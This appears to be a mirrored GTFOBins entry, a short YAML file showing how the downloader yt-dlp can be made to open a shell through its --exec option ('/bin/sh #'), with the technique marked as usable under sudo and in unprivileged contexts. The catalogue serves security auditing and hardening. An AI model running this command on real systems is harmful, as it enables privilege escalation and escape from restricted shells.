mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
12 lines
266 B
Plaintext
12 lines
266 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
yt-dlp 'https://www.youtube.com/watch?v=xxxxxxxxxxx' --exec '/bin/sh #'
|
|
comment: |-
|
|
The URL must point to a valid YouTube video which will be actually downloaded.
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|